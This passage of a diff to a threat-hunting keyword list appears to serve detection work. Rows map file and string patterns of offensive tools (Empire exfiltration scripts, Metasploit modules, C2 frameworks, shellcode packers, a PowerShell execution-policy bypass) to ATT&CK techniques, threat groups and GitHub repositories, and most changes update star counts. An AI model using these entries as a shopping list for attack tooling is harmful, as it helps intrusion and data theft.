APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" "*execute-Pezor*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*execute-shellcode.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*execute-shellcode.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" "*Execution_CommandAndScriptingInterpreter_UploadAndExec.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackCreateThreadpoolWait.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_CallbackCreateTimerQueue.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -10061,8 +10212,8 @@ "*Execution_UserExecution_NtCreateSection.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_Syscall_inject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*Execution_UserExecution_VSSyscallProject.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*-ExecutionPolicy Bypass -File Win10.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" -"*-ExecutionPolicy Bypass -File Win11.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6323","1248","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*-ExecutionPolicy Bypass -File Win10.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" +"*-ExecutionPolicy Bypass -File Win11.ps1 *","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","0","N/A","N/A","10","6326","1249","2023-10-03T19:02:49Z","2019-03-26T22:36:32Z" "*exegol4thewin*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ExegolController.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*exegol-docker-build*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" @@ -10072,22 +10223,22 @@ "*ExegolProgress.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ExegolPrompt.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ExeStager.csproj*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*ExeToInjectInTo.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*ExeToLaunch StringToBePutAsCmdline*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*ExetoText.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ExeToInjectInTo.*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ExeToLaunch StringToBePutAsCmdline*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*ExetoText.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExfilDataToGitHub.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ExfilDataToGitHub*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1140","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" "*exfiltrate_via_post.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","1","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" -"*Exfiltration from DNS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*Exfiltration from HTTPS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"*Exfiltration.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*existing_auto_target.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*Exfiltration from DNS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration from HTTPS finished!*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*Exfiltration.tests.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*existing_auto_target.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*exit_nimbo*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*--expected Bad --expected-stop Welcome*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*expl-bin*","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*explib2_ie11_exec_test_case.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*exploit*wordpress_add_admin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*explib2_ie11_exec_test_case.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*exploit*wordpress_add_admin*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "*exploit.bash*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bat*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.bin*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" @@ -10106,42 +10257,42 @@ "*exploit.vbs*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.vbscript*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" "*exploit.zsh*","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","3","209","75","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z" -"*exploit_frameworks.py*","offensive_tool_keyword","hackingtool","ALL IN ONE 